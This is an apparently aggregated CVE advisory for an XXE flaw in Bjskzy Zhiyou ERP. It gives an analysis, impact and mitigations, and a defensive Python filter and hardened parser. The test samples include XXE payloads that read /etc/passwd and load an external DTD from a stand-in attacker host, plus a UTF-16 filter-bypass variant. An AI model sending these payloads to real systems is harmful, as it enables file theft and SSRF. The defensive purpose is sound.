
CVE-2025-11140: XML External Entity Reference in Bjskzy Zhiyou ERP

Severity: Medium
Published: Mon Sep 29 2025 (09/29/2025, 04:02:05 UTC)
Source: CVE Database V5
Vendor/Project: Bjskzy
Product: Zhiyou ERP

Description

A vulnerability was identified in Bjskzy Zhiyou ERP up to 11.0. Affected is the function openForm of the component com.artery.richclient.RichClientService. Manipulation of the argument contentString leads to XML external entity (XXE) reference. The attack can be executed remotely. A public exploit is available and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

AI-Powered Analysis

Last updated: 09/29/2025, 04:14:52 UTC

Technical Analysis

CVE-2025-11140 is an XML External Entity (XXE) vulnerability in Bjskzy Zhiyou ERP, affecting versions up to and including 11.0. The flaw is in the openForm function of the component com.artery.richclient.RichClientService, which parses the argument contentString as XML. An attacker who controls contentString can prepend a DOCTYPE that declares external entities; if the parser resolves them, each entity reference is replaced with content fetched from the URI the attacker chose. Depending on the parser's configuration, that gives the attacker read access to files the ERP process can open, a way to make the server issue HTTP or other requests on the attacker's behalf (SSRF, including out-of-band exfiltration through a parameter entity loaded from an attacker-hosted DTD), or denial of service through recursive entity expansion. The entry carries a CVSS 4.0 base score of 6.9 (medium): network attack vector, low attack complexity, no special attack requirements, no privileges and no user interaction, with low impact on each of confidentiality, integrity and availability. The low impact ratings reflect that XXE on its own usually yields bounded data disclosure rather than code execution; the real impact depends on what the parser will resolve and what the ERP host can reach. A public exploit exists, but there are no confirmed reports of exploitation in the wild. The vendor did not respond to the disclosure, so no fixed version is known. Given the ERP system's role in managing critical business processes, exploitation could lead to unauthorized data disclosure or disruption of operations.

Potential Impact

For European organizations running Bjskzy Zhiyou ERP up to version 11.0, this vulnerability threatens the confidentiality and integrity of sensitive business data. ERP systems typically hold financial, operational and personnel information, so an XXE attack could expose files readable by the ERP service account (configuration files holding database credentials are a common target) or let an attacker reach internal services from the ERP host via SSRF. The remote, unauthenticated nature of the exploit increases the likelihood of attack attempts, especially where the ERP system is exposed to the internet or insufficiently segmented. Disruption or data leakage could lead to regulatory non-compliance under GDPR, financial losses, reputational damage and operational downtime. The lack of vendor response and patch availability exacerbates the risk, as organizations must rely on mitigations or workarounds. The medium severity rating indicates that, while serious, the vulnerability is unlikely to lead to full system compromise without additional factors such as credentials recovered from disclosed files. However, the strategic importance of ERP systems in European enterprises means even limited exploitation could have outsized consequences.

Mitigation Recommendations

Given the absence of an official patch, European organizations should implement the following specific mitigations:

1) Restrict network exposure of the Bjskzy Zhiyou ERP system: do not expose it, and in particular the RichClientService endpoint, to the internet; place it behind firewalls and limit access to trusted internal networks or VPN users.

2) Deploy web application firewall (WAF) rules that block requests whose XML body contains a DOCTYPE or ENTITY declaration. The filter must decode the body the way the parser will (UTF-16 encodings, compressed or chunked bodies), otherwise it can be bypassed; treat the WAF as a compensating control, not a fix.

3) Disable DTD processing and external entity resolution in the ERP's XML parser if the configuration is reachable. The component's Java package name indicates a Java application; for JAXP-based parsers the standard features are http://apache.org/xml/features/disallow-doctype-decl, http://xml.org/sax/features/external-general-entities and http://xml.org/sax/features/external-parameter-entities, and the JVM-wide property javax.xml.accessExternalDTD (settable in jaxp.properties or as a -D system property, set to an empty string) restricts external DTD and entity access without code changes. Note that the property only governs the JDK's built-in JAXP implementation; an application that bundles its own parser or installs its own entity resolver may ignore it, so verify with a test payload.

4) Monitor for exploitation: log and alert on XML requests containing a DOCTYPE, and watch egress from the ERP host. Outbound HTTP, FTP or DNS traffic from the ERP to unexpected destinations is the signature of out-of-band XXE exfiltration, and an egress allow-list on the host's firewall blunts both exfiltration and SSRF.

5) Conduct regular security assessments and penetration testing focused on XML input handling, using the public exploit to verify that the controls above actually hold.

6) Prepare incident response plans for data breaches or service disruptions related to this vulnerability.

7) Engage with the vendor for updates and consider alternative ERP solutions if remediation is not forthcoming.

8) Isolate the ERP system from other critical infrastructure to limit lateral movement in case of compromise.
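The parser behaviour described in the technical analysis and the two controls above that a defender can implement without vendor cooperation (the pre-parse filter in item 2 and the hardened parser in item 3), as an added example that is not code from this page or from Bjskzy. It is written in Python against the standard-library expat parser; the Zhiyou ERP component is Java, so the configuration knobs differ there, but the two layers are the same. The sample payloads and the element names (form, name, id) are constructed for the example; the real format of contentString is not documented on this page.

```python
import re
import xml.parsers.expat as expat

# Constructed sample payloads (not from the advisory): what a contentString
# argument might carry legitimately, and three XXE variants an attacker would send.
BENIGN = b"<form><name>invoice</name><id>42</id></form>"
FILE_READ = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE form [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<form><name>&xxe;</name><id>42</id></form>"
)
OOB_DTD = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE form [<!ENTITY % ext SYSTEM "http://attacker.invalid/x.dtd"> %ext;]>'
    b"<form><name>x</name></form>"
)
# Same payload as FILE_READ re-encoded as UTF-16: a byte-level grep for b"<!DOCTYPE" misses it.
FILE_READ_UTF16 = FILE_READ.decode("ascii").encode("utf-16")

# XML keywords are case-sensitive, so these are the only spellings the parser accepts;
# a lowercase "<!doctype" is already a well-formedness error and never reaches entity expansion.
_DTD_MARKERS = re.compile(r"<!DOCTYPE|<!ENTITY")


def decode_as_parser_would(raw: bytes) -> str:
    """Decode by BOM / first bytes, as an XML parser does, so a UTF-16 payload
    cannot hide '<!DOCTYPE' from a filter that only looks at UTF-8 bytes."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    if raw.startswith(b"\xef\xbb\xbf"):
        return raw.decode("utf-8-sig")
    if len(raw) >= 2 and raw[0] == 0x3C and raw[1] == 0x00:   # "<\0": UTF-16-LE without BOM
        return raw.decode("utf-16-le")
    if len(raw) >= 2 and raw[0] == 0x00 and raw[1] == 0x3C:   # "\0<": UTF-16-BE without BOM
        return raw.decode("utf-16-be")
    return raw.decode("utf-8", errors="replace")


def reject_xxe_payload(raw: bytes):
    """Pre-parse gate, i.e. the check a WAF rule or input filter implements.
    Returns a reason string when the document carries DTD machinery, else None.
    A form payload never needs a DOCTYPE, so any DOCTYPE is rejected outright; the
    trade-off is that the same text inside CDATA or a comment also trips the filter."""
    m = _DTD_MARKERS.search(decode_as_parser_would(raw))
    return None if m is None else f"blocked: {m.group(0)} at character {m.start()}"


class XxeAttempt(Exception):
    """Raised when the hardened parser meets a DOCTYPE or an external entity."""


def parse_untrusted(raw: bytes) -> dict:
    """Parse with DOCTYPE and external-entity resolution refused (fail closed).
    Returns {tag: text} for the root element's direct children."""
    p = expat.ParserCreate()
    out, stack = {}, []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise XxeAttempt(f"DOCTYPE {name!r} refused")

    def on_external_entity(context, base, system_id, public_id):
        # Not reachable once every DOCTYPE is refused; kept as a second layer.
        raise XxeAttempt(f"external entity {system_id!r} refused")

    def on_start(tag, attrs):
        stack.append((tag, []))

    def on_chars(data):
        if stack:
            stack[-1][1].append(data)   # expat may deliver text in several chunks

    def on_end(tag):
        name, parts = stack.pop()
        if len(stack) == 1:             # direct child of the root element
            out[name] = "".join(parts).strip()

    p.StartDoctypeDeclHandler = on_doctype
    p.ExternalEntityRefHandler = on_external_entity
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    p.StartElementHandler = on_start
    p.EndElementHandler = on_end
    p.CharacterDataHandler = on_chars
    p.Parse(raw, True)                  # expat detects the UTF-16 BOM itself
    return out


def parser_refuses(raw: bytes) -> bool:
    """True when parse_untrusted() rejects the document as an XXE attempt."""
    try:
        parse_untrusted(raw)
    except XxeAttempt:
        return True
    return False


if __name__ == "__main__":
    samples = [("benign", BENIGN), ("file read", FILE_READ),
               ("oob dtd", OOB_DTD), ("utf-16", FILE_READ_UTF16)]
    for label, doc in samples:
        print(f"{label:10} filter={reject_xxe_payload(doc)!r} parser_refuses={parser_refuses(doc)}")
    print("parsed benign document:", parse_untrusted(BENIGN))
```

The filter catches the UTF-16 variant only because it decodes the body before matching; a rule that greps raw bytes for `<!DOCTYPE` lets that variant through, which is why item 2 calls the WAF a compensating control. The parser layer does not depend on the filter: any DOCTYPE aborts the parse before an entity can be declared, and parameter-entity parsing is switched off so an external DTD is never fetched. Malformed XML that is not an XXE attempt still raises expat's own ExpatError, which the caller should treat as a rejected request rather than swallow.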


Technical Details

Data Version: 5.1
Assigner Short Name: VulDB
Date Reserved: 2025-09-28T18:42:31.177Z
CVSS Version: 4.0
State: PUBLISHED

Threat ID: 68da07a4c27c13ff57ca8165

Added to database: 9/29/2025, 4:14:28 AM

Last enriched: 9/29/2025, 4:14:52 AM

Last updated: 9/29/2025, 6:24:46 AM

